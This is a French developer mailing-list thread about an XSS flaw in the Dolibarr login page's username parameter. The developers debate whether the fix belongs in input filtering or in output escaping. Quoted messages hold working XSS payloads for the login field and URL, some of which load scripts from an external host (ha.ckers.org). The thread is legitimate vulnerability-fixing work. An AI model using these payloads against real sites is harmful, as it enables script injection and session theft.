dans le template on a ça
(GETPOST('username')?GETPOST('username'):$login)
et dans la fonction qui appel le template on ça
$login = (! empty($hookmanager->resArray['username']) ?
$hookmanager->resArray['username'] :
(GETPOST("username","alpha",2) ? GETPOST("username","alpha",2) :
$demologin));
pas besoin de refaire 2 fois la même chose
le GETPOST du template ne sont pas filtré, alors que dans la
fonction si
j'avais testé en enlevant ceux du template et je n'avais pas
d'erreur
si tu les laisses, les GETPOST du template vont écrasé ceux de la
fonction
Le 08/09/12 13:49, Laurent Destailleur
a écrit :
Le 08/09/2012 13:37, Régis Houssin a
écrit :
tu es têtu, tu as supprimé ma correction sans tester :-)
$username suffit dans les templates, le filtrage est déjà géré
dans la fonction
Bien sur que j'ai testé.
Et je confirme que ta correction ne marche pas. Et que la mienne
etait bonne.
Le 08/09/12 13:35, Régis Houssin a
écrit :
si j'ai testé avant
dans les templates on avait
(GETPOST('username')?GETPOST('username'):$username)
alors que ceci est déjà géré dans la fonction avec
GETPOST('username','alpha',3)
en enlevant ceux des templates on a pas besoin de la fonction
dol_escape_htmltag
Le 08/09/12 13:31, Laurent
Destailleur a écrit :
Le 08/09/2012 13:29, Régis
Houssin a écrit :
c'était les GETPOST dans les templates, ils sont déjà géré
dans security2.lib.php
Non, les GETPOST n'ont rien a voir avec les failles de
securité. Il ne faut pas compter dessus pour corriger. Cela
n'est qu'une bidouille pour corriger 90% des defauts (qui
sont ailleurs) mais n'est pas une solution et ne sera jamais
une solution fiable.
La faille venais du non echappement de la donnée au moment
de son exploitation (non utlisation du dol_escape_...)
Le 08/09/12 13:22, Laurent
Destailleur a écrit :
Fixed
Le 08/09/2012 13:11, Régis Houssin a écrit :
ce qui est étonnant c'est que ça ne le fait pas sur la
3.1
Le 08/09/12 13:08, The
mailing-list for Dolibarr foundation members a
écrit :
je préviens le bureau quand même :-)
à mettre dans l'url de la page de login
l'image appelée pourrais contenir n'importe quel
autre code
je dit ça je dit rien :-)
/index.php?username="><SCRIPT SRC=""
moz-do-not-send="true"
class="moz-txt-link-rfc2396E"
href="http://ha.ckers.org/xss.jpg">"http://ha.ckers.org/xss.jpg"></SCRIPT>
Le 08/09/12 12:57,
Régis Houssin a écrit :
celui là passe en GET
/index.php?username="><LAYER
SRC="" moz-do-not-send="true" class="moz-txt-link-rfc2396E" href="http://ha.ckers.org/scriptlet.html">"http://ha.ckers.org/scriptlet.html"></LAYER>
Le 08/09/12 12:48, Régis Houssin a écrit :
encore mieux :-)
celui là renvoi bien une fenêtre d'alerte
"><BODY
Le 08/09/12 12:34, Régis Houssin a écrit :
utilise ceci dans le champ "login" de la page d'authentification et valide
et regarde le source de la page
pas d'alerte _javascript_ mais une possible faille, le code est injecté
tel quel
"><IMG SRC="" moz-do-not-send="true" class="moz-txt-link-rfc2396E" href="_javascript_:alert('XSS');">"_javascript_:alert('XSS');">
Cordialement,
Cordialement,
Cordialement,
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
--
Laurent
EMail: address@hidden
Web: http://www.destailleur.fr
Messenger GTalk/Jabber: address@hidden
Tel: 0662724322
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
--
Laurent
EMail: address@hidden
Web: http://www.destailleur.fr
Messenger GTalk/Jabber: address@hidden
Tel: 0662724322
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
--
Laurent
EMail: address@hidden
Web: http://www.destailleur.fr
Messenger GTalk/Jabber: address@hidden
Tel: 0662724322
Cordialement,
--
Régis Houssin
---------------------------------------------------------
Cap-Networks
Cidex 1130
34, route de Gigny
71240 MARNAY
FRANCE
VoIP: +33 1 83 62 40 03
GSM: +33 6 33 02 07 97
Web: http://www.cap-networks.com/
Email: address@hidden
Dolibarr developer: address@hidden
Web Portal: http://www.dolibarr.fr/
SaaS offers: http://www.dolibox.fr/
Shop: http://www.dolistore.com/
Development platform: https://doliforge.org/
---------------------------------------------------------
|